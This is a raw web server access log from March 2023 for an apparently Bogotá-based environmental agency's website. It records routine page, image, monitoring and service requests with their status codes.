107.170.228.17 - - [24/Mar/2023:03:04:17 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [24/Mar/2023:03:04:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
192.168.175.240 - - [24/Mar/2023:03:04:30 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [24/Mar/2023:03:05:02 -0500] "HEAD / HTTP/1.1" 200 -
17.246.23.132 - - [24/Mar/2023:03:05:28 -0500] "-" 408 -
192.168.175.240 - - [24/Mar/2023:03:05:30 -0500] "GET / HTTP/1.1" 200 4720
14.102.94.186 - - [24/Mar/2023:03:05:38 -0500] "GET / HTTP/1.1" 200 319
64.124.8.48 - - [24/Mar/2023:03:06:29 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/ANALISIST-257-96.docx HTTP/1.1" 304 -
192.168.175.240 - - [24/Mar/2023:03:06:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:03:07:30 -0500] "GET / HTTP/1.1" 200 4720
66.249.70.182 - - [24/Mar/2023:03:08:15 -0500] "-" 408 -
192.168.175.240 - - [24/Mar/2023:03:08:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:03:06:50 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Mar/2023:03:07:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
31.192.237.44 - - [24/Mar/2023:03:09:21 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [24/Mar/2023:03:09:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
192.168.175.240 - - [24/Mar/2023:03:09:30 -0500] "GET / HTTP/1.1" 200 4720
35.236.215.231 - - [24/Mar/2023:03:09:46 -0500] "GET /distrito-declara-alerta-preventiva-en-el-suroccidente-de-la-ciudad-por-mala-calidad-del-aire.html HTTP/1.1" 200 1065
35.236.215.231 - - [24/Mar/2023:03:09:46 -0500] "GET /distrito-declara-alerta-preventiva-en-el-suroccidente-de-la-ciudad-por-mala-calidad-del-aire.html HTTP/1.1" 200 1065
216.245.221.92 - - [24/Mar/2023:03:10:02 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [24/Mar/2023:03:10:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:03:11:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:03:11:43 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1018
172.22.2.4 - - [24/Mar/2023:03:11:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
192.168.175.240 - - [24/Mar/2023:03:12:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:03:13:30 -0500] "GET / HTTP/1.1" 200 4720
181.152.228.194 - - [24/Mar/2023:03:13:59 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-el-inicio-de-la-tercera-fase.html HTTP/1.1" 200 954
4.246.124.237 - - [24/Mar/2023:03:14:00 -0500] "GET /galeria/galeria/fotos/Humedal-la-conejera2G.jpg HTTP/1.1" 200 298801
172.22.2.4 - - [24/Mar/2023:03:12:40 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [24/Mar/2023:03:14:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
192.168.175.240 - - [24/Mar/2023:03:14:30 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [24/Mar/2023:03:15:02 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Mar/2023:03:13:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
172.22.2.4 - - [24/Mar/2023:03:15:24 -0500] "GET /BLA/boletinlegal/showLogin.cc HTTP/1.1" 404 1018
192.168.175.240 - - [24/Mar/2023:03:15:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:03:15:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 28619
192.168.175.240 - - [24/Mar/2023:03:16:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:03:17:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:03:18:30 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [24/Mar/2023:03:19:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
192.168.175.240 - - [24/Mar/2023:03:19:30 -0500] "GET / HTTP/1.1" 200 4720
66.249.70.180 - - [24/Mar/2023:03:19:33 -0500] "-" 408 -
201.245.192.253 - - [24/Mar/2023:03:19:41 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [24/Mar/2023:03:20:02 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Mar/2023:03:18:30 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [24/Mar/2023:03:20:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43170
201.245.192.253 - - [24/Mar/2023:03:20:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43503
88.80.190.234 - - [24/Mar/2023:03:20:27 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
192.168.175.240 - - [24/Mar/2023:03:20:30 -0500] "GET / HTTP/1.1" 200 4720
